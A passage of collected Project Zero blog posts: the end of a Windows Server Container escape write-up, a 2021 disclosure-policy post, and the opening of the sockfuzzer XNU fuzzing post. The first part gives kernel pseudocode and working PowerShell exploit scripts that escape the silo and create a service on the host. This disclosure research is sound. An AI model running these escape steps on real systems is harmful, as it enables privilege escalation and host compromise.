No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.

The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.

The main enforcement mechanism used by the kernel to provide the container’s isolation is by calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong, the following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {

  if (PsIsCurrentThreadInServerSilo() 

    || !TargetHive

    || TargetHive == SourceHive) {

    return TRUE;


  if (SourceHive->Flags.Trusted)

    return FALSE;

  // Check trust list.


Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.


  if (Silo) {

    PPSP_STORAGE Storage = Silo->Storage;

    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];

    if (Slot->Present)

      return Slot->Value;


  return ObpRootDirectoryObject;


We can see that the function will extract a storage parameter from the passed-in silo, if present it will return the value of the slot. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code.

PEJOB silo = PsGetCurrentSilo();


Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {

  PETHREAD Thread = PsGetCurrentThread();

  PEJOB silo = Thread->Silo;

  if (silo == (PEJOB)-3) {

    silo = Thread->Tcb.Process->Job;

    while(silo) {

      if (silo->JobFlags & EJOB_SILO) {



      silo = silo->ParentJob;



  return silo;


A silo can be associated with a thread, through impersonation or as can be one job in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches for any job in the job hierarchy for the process for anything which has the JOB_SILO flag set. If a silo is found, it’s returned from the function, otherwise NULL would be returned.

This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager to using the root directory all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"

PS> $root.FullPath


PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> $root.FullPath


To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the root root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container as the system volume for the container is an accessible device on the host we can just access.

As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container’s SCM, not the hosts.

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()

PS> $sym_path = "$env:SystemDrive\symbols"

PS> mkdir $sym_path | Out-Null

PS> $services_path = "$env:SystemRoot\system32\services.exe"

PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'

# You can also use the following to run a container based executable.

#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {

#   "\\.\GLOBALROOT" + $f.FullPath


PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path

PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | 

   Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'

PS> $client = Get-RpcClient $rpc

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> Connect-RpcClient $client -EndpointPath ntsvcs

PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `

 [NullString]::Value, `


PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `

 [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `

 [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)

PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120 which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.

After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.


The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.

Policy and Disclosure: 2021 Edition

Posted by Tim Willis, Project Zero

At Project Zero, we spend a lot of time discussing and evaluating vulnerability disclosure policies and their consequences for users, vendors, fellow security researchers, and software security norms of the broader industry. We aim to be a vulnerability research team that benefits everyone, working across the entire ecosystem to help make 0-day hard.


We remain committed to adapting our policies and practices to best achieve our mission,  demonstrating this commitment at the beginning of last year with our 2020 Policy and Disclosure Trial.

As part of our annual year-end review, we evaluated our policy goals, solicited input from those that receive most of our reports, and adjusted our approach for 2021.

Summary of changes for 2021

Starting today, we're changing our Disclosure Policy to refocus on reducing the time it takes for vulnerabilities to get fixed, improving the current industry benchmarks on disclosure timeframes, as well as changing when we release technical details.

The short version: Project Zero won't share technical details of a vulnerability for 30 days if a vendor patches it before the 90-day or 7-day deadline. The 30-day period is intended for user patch adoption.

The full list of changes for 2021:

2020 Trial ("Full 90")

2021 Trial ("90+30")

  1. Public disclosure occurs 90 days after an initial vulnerability report, regardless of when the bug is fixed. Technical details (initial report plus any additional work) are published on Day 90. A 14-day grace period* is allowed.
    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 90 days. If an issue remains unpatched after 90 days, technical details are published immediately. If the issue is fixed within 90 days, technical details are published 30 days after the fix. A 14-day grace period* is allowed.
    Earlier disclosure with mutual agreement.
  1. For vulnerabilities that were actively exploited in-the-wild against users, public disclosure occurred 7 days after the initial vulnerability report, regardless of when the bug is fixed.

    In-the wild vulnerabilities are not offered a grace period

    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 7 days for issues that are being actively exploited in-the-wild against users. If an issue remains unpatched after 7 days, technical details are published immediately. If the issue is fixed within 7 days, technical details are published 30 days after the fix.

    Vendors can request a 3-day grace period* for in-the-wild bugs.

    Earlier disclosure with mutual agreement.
  1. Technical details are immediately published when a vulnerability is patched in the grace period*.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 100)
  1. If a grace period* is granted, it uses up a portion of the 30-day patch adoption period.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 120)

Elements of the 2020 trial that will carry over to 2021:

2020 Trial + 2021 Trial

1. Policy goals:

  • Faster patch development
  • Thorough patch development
  • Improved patch adoption

2. If Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

3. If a 90-day deadline is missed, technical details are made public on Day 90, unless a grace period* is requested and confirmed prior to deadline expiry.

4. If a 7-day deadline is missed, technical details are made public on Day 7, unless a grace period* is requested and confirmed prior to deadline expiry.

* The grace period is an additional 14 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 90 days, but do expect it to be fixed within 104 days. Grace periods will not be granted for vulnerabilities that are expected to take longer than 104 days to fix.  For vulnerabilities that are being actively exploited and reported under the 7 day deadline, the grace period is an additional 3 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 7 days, but do expect it to be fixed within 10 days.

Rationale on changes for 2021

As we discussed in last year's "Policy and Disclosure: 2020 Edition", our three vulnerability disclosure policy goals are:

  1. Faster patch development: shorten the time between a bug report and a fix being available for users.
  2. Thorough patch development: ensure that each fix is correct and comprehensive.
  3. Improved patch adoption: shorten the time between a patch being released and users installing it.

Our policy trial for 2020 aimed to balance all three of these goals, while keeping our policy consistent, simple, and fair. Vendors were given 90 days to work on the full cycle of patch development and patch adoption. The idea was if a vendor wanted more time for users to install a patch, they would prioritize shipping the fix earlier in the 90 day cycle rather than later.

In practice however, we didn't observe a significant shift in patch development timelines, and we continued to receive feedback from vendors that they were concerned about publicly releasing technical details about vulnerabilities and exploits before most users had installed the patch. In other words, the implied timeline for patch adoption wasn't clearly understood.

The goal of our 2021 policy update is to make the patch adoption timeline an explicit part of our vulnerability disclosure policy. Vendors will now have 90 days for patch development, and an additional 30 days for patch adoption.

This 90+30 policy gives vendors more time than our current policy, as jumping straight to a 60+30 policy (or similar) would likely be too abrupt and disruptive. Our preference is to choose a starting point that can be consistently met by most vendors, and then gradually lower both patch development and patch adoption timelines.

For example, based on our current data tracking vulnerability patch times, it's likely that we can move to a "84+28" model for 2022 (having deadlines evenly divisible by 7 significantly reduces the chance our deadlines fall on a weekend). Beyond that, we will keep a close eye on the data and continue to encourage innovation and investment in bug triage, patch development, testing, and update infrastructure.

Risk and benefits

Much of the debate around vulnerability disclosure is caught up on the issue of whether rapidly releasing technical details benefits attackers or defenders more. From our time in the defensive community, we've seen firsthand how the open and timely sharing of technical details helps protect users across the Internet. But we also have listened to the concerns from others around the much more visible "opportunistic" attacks that may come from quickly releasing technical details.

We continue to believe that the benefits to the defensive community of Project Zero's publications outweigh the risks of disclosure, but we're willing to incorporate feedback into our policy in the interests of getting the best possible results for user security. Security researchers need to be able to work closely with vendors and open source projects on a range of technical, process, and policy issues -- and heated discussions about the risk and benefits of technical vulnerability details or proof-of-concept exploits has been a significant roadblock.

While the 90+30 policy will be a slight regression from the perspective of rapidly releasing technical details, we're also signaling our intent to shorten our 90-day disclosure deadline in the near future. We anticipate slowly reducing time-to-patch and speeding up patch adoption over the coming years until a steady state is reached.

Finally, we understand that this change will make it more difficult for the defensive community to quickly perform their own risk assessment, prioritize patch deployment, test patch efficacy, quickly find variants, deploy available mitigations, and develop detection signatures. We're always interested in hearing about Project Zero's publications being used for defensive purposes, and we encourage users to ask their vendors/suppliers for actionable technical details to be shared in security advisories.


Moving to a "90+30" model allows us to decouple time to patch from patch adoption time, reduce the contentious debate around attacker/defender trade-offs and the sharing of technical details, while advocating to reduce the amount of time that end users are vulnerable to known attacks.

Disclosure policy is a complex topic with many trade-offs to be made, and this wasn't an easy decision to make. We are optimistic that our 2021 policy and disclosure trial lays a good foundation for the future, and has a balance of incentives that will lead to positive improvements to user security.

Designing sockfuzzer, a network syscall fuzzer for XNU

Posted by Ned Williamson, Project Zero


When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects –  with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs that caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_proto was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);

Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target and the edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

“Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:





    # ...







    # ...



protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/ ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})

Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:

      _if_clone_detach in libxnu.a(if.c.o)

  "_zfree", referenced from:

      _kqueue_destroy in libxnu.a(kern_event.c.o)

      _knote_free in libxnu.a(kern_event.c.o)

      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)

      _kev_delete in libxnu.a(kern_event.c.o)

      _pipepair_alloc in libxnu.a(sys_pipe.c.o)

      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)

      _so_cache_timer in libxnu.a(uipc_socket.c.o)


  "_zinit", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _pipeinit in libxnu.a(sys_pipe.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _unp_init in libxnu.a(uipc_usrreq.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)


  "_zone_change", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      _ifa_init in libxnu.a(if.c.o)

      _if_clone_attach in libxnu.a(if.c.o)


ld: symbol(s) not found for architecture x86_64

clang: error: linker command failed with exit code 1 (use -v to see invocation)

ninja: build stopped: subcommand failed.

To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation
void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. This goal can be achieved with linker flags, but it was a simple enough solution that allowed me to get nice backtraces when I hit an unimplemented function.

// Unimplemented stub functions

// These should be replaced with real or mock impls.

#include <kern/assert.h>

#include <stdbool.h>

int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {

  printf("%s: assert failed on line %d: %s\n", file, line, expression);



void IOBSDGetPlatformUUID() { assert(false); }

void IOMapperInsertPage() { assert(false); }

// ...

Then we just link this file into the XNU library we’re building by adding it to the source list:




    # ...






As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in
libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,

                                                          socklen_t* anamelen,

                                                          int* retval) {

  struct accept_args uap = {

      .s = s,

      .name = name,

      .anamelen = anamelen,


  return accept(kernproc, &uap, retval);


Note the visibility attribute that explicitly exports the symbol from the library. Due to the simplicity of these wrappers I created a script to automate this called using syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)

With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/ ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)


                       PRIVATE -g






target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})


target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)


Writing a Fuzz Target

